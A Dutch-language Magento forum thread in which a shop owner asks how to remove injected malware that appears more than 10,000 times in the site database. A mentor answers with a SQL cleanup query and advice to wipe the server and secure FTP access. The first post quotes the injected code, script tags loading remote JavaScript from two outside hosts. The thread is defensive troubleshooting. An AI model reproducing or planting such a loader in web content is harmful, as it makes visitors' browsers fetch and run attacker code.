Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Mal gen verwijderen?? 
 
check01
Jr. Member
 
Total Posts:  16
Joined:  2009-11-25
 

Vanwege een mal gen (Avast geeft melding HTML:Script-inf als type) in mijn database ligt mijn site (logischerwijs) plat. Ik denk dat ik de bron gevonden heb. Hoe kan ik deze definitief via phpmyadmin verwijderen??? De code komt meer dan 10.000 keer in mijn database.....  Zie de volgende code:

document . write(’< ‘ + ‘ cript src="http://oployau.fancountblogger.com:8080/Backup.js
< script src=” http://hoploiyt.hyipface.com:8080/Zip.js">

Bedankt voor elke reactie, ik zit redelijk met mijn handen in het haar om eerlijk te zijn. Temeer omdat de database volledig handmatig ingevoerd moest worden en dit zeeen van werk was...... Ik hoop dat ik hem kan redden.

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Mentor
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Per table moet het lukken. Meestal is het alleen de value column.

DELETE FROM Table_Name WHERE Column LIKE '&#xop;loyau%';

(Na LIKE is het een ‘ dan procent teken, dan een gedeelte van de hacker’s url, dan procent weer en dan weer een ‘ - dit klote forum software kan zoiets niet aan)

Maar als je dat opschoont ben je nog steeds niet zeker van het verwijderen van je virus. Er is toch echt maar 1 manier en dat is een volledige format van je web space.

Wat je daar in de DB ziet is output. De hacker hoopt dat dit dus door de browser gerendered en uitgevoerd wordt. Backup.js en Zip.js op die hacker’s site gaan dan weer shit doen op jouw bezoekers’ computers. Wat je ziet is dus de output, niet de bron. Iets wat hoogstwaarschijnlijk nog steeds op jouw server is heeft dat in de DB gestopt. Haal jij het er weer uit maar pak je niet de bron van deze ellende aan, dan stopt hij het geween weer terug.

Het kan 1 filetje zijn dus een speld in ee hooiberg. Alles verwijderen is de enige manier om jezelf gerust te laten zijn dat jouw klanten hier niet langer last van gaan krijgen.

En dan voorkomen door hele sterke FTP passwords, en deze niet op te slaan in je FTP client. Een hardware firewall is ook geen overbodige luxe etc.

 
Magento Community Magento Community
Magento Community
Magento Community
 
check01
Jr. Member
 
Total Posts:  16
Joined:  2009-11-25
 

Hoi Johan,

Bedankt voor je snelle reactie!! Ik ga er mee aan de gang! Nogmaals dank!!

Remco

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top